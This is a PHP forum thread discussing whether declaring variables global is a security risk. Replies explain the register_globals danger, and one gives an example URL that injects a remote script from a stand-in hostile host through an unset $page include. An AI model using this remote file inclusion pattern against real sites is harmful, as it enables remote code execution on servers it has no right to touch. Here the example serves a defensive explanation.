Hi,
I am still fairly new to PHP and I have a question regarding what the security risks are of setting variables GLOBAL.
You hear here and there that it is a 'security risk' and that it is 'bad practice' but I have not found one article on the net that actually describes IN DETAIL why it poses a security risk and why it is bad practice.
Just to clear this up, I am aware that you should never set variables global that hold sensitive information...
Here is a simple example:
I have about 50 pages in a site that all make use of function test (defined below). Function test can use up to 5 variables - 3 are needed - the other 2 are optional depending on the page the function is called. As of right now the function looks like this...
function test($var1, $var2, $var3, $var4, $var5)
{
// do something
}
--> as u can see: we call the function and pass in 5 vars on all 50 pages...
Now, if the needed functionality might change in the future, and therefore the vars passed in, I would have to rewrite the code on ALL 50 pages...
So I thought to change the function to this:
function test()
{
global $var1;
global $var2;
global $var3;
global $var4;
global $var5;
// do something
}
calling the function then on all 50 pages without the need to pass in vars would make this setup very FLEXIBLE for future changes, as I would just change the number of vars needed inside the function...
Coming back to my original question, what would be the security risk and why would this be 'bad practice' ? I am trying to come up with a solution that is as FLEXIBLE as possible...
Note: all vars used in the function DO NOT hold any sensitive data...
Thanx for your help in advance !!!
- M
Security risk of setting variables global...
Moderator: General Moderators
Re: Security risk of setting variables global...
I think they mean register globals - there's nothing wrong with what you're doing.
Register globals will populate the script with variables from get,post,cookie etc... data. It's a completely stupid idea.
So say i was coding, and I forgot to define $page as 'index.php', and I was doing include $page;, someone could just go http://...co.uk/script.php?page=http://nastysite.com/theirscript.php and include their own files.
So that's the security risk.
Register globals will populate the script with variables from get,post,cookie etc... data. It's a completely stupid idea.
So say i was coding, and I forgot to define $page as 'index.php', and I was doing include $page;, someone could just go http://...co.uk/script.php?page=http://nastysite.com/theirscript.php and include their own files.
So that's the security risk.
- kaisellgren
- DevNet Resident
- Posts: 1675
- Joined: Sat Jan 07, 2006 5:52 am
- Location: Lahti, Finland.
Re: Security risk of setting variables global...
Please put your code inside
Code: Select all
and [/code ] tags.
Avoiding global variables and methods/functions is a good idea. Maybe you would like to read this: http://stackoverflow.com/questions/357187/global-variables-when-are-they-acceptable
As what comes to security, Register Globals are evil. However, if you have them disabled and you are overusing global variables, then you could at some point easily misuse some of your variables as they are all global. A variable being global means it's accessible from everywhere. If you have filtered a variable, which is globally accessible, how are you going to ensure that the variable has not been changed by any other code? This is a bit far-fetched and there are always situations where data might have been changed by some other code, but with globals it can only get worse.Re: Security risk of setting variables global...
Globals are perfectly fine in many cases though...right?
Say like, a function which needs access to a class....instead of initialising a new class, or passing it by reference, you could just global the variable that contains it.
Surely that's the better way to do it?
Say like, a function which needs access to a class....instead of initialising a new class, or passing it by reference, you could just global the variable that contains it.
Surely that's the better way to do it?
- kaisellgren
- DevNet Resident
- Posts: 1675
- Joined: Sat Jan 07, 2006 5:52 am
- Location: Lahti, Finland.
Re: Security risk of setting variables global...
Globals can be okay and all PHP functions and classes are basically just global. Currently my application that I'm working on has a few constants that are globally accessible, but they are in my project namespace though (I'm using PHP 5.3).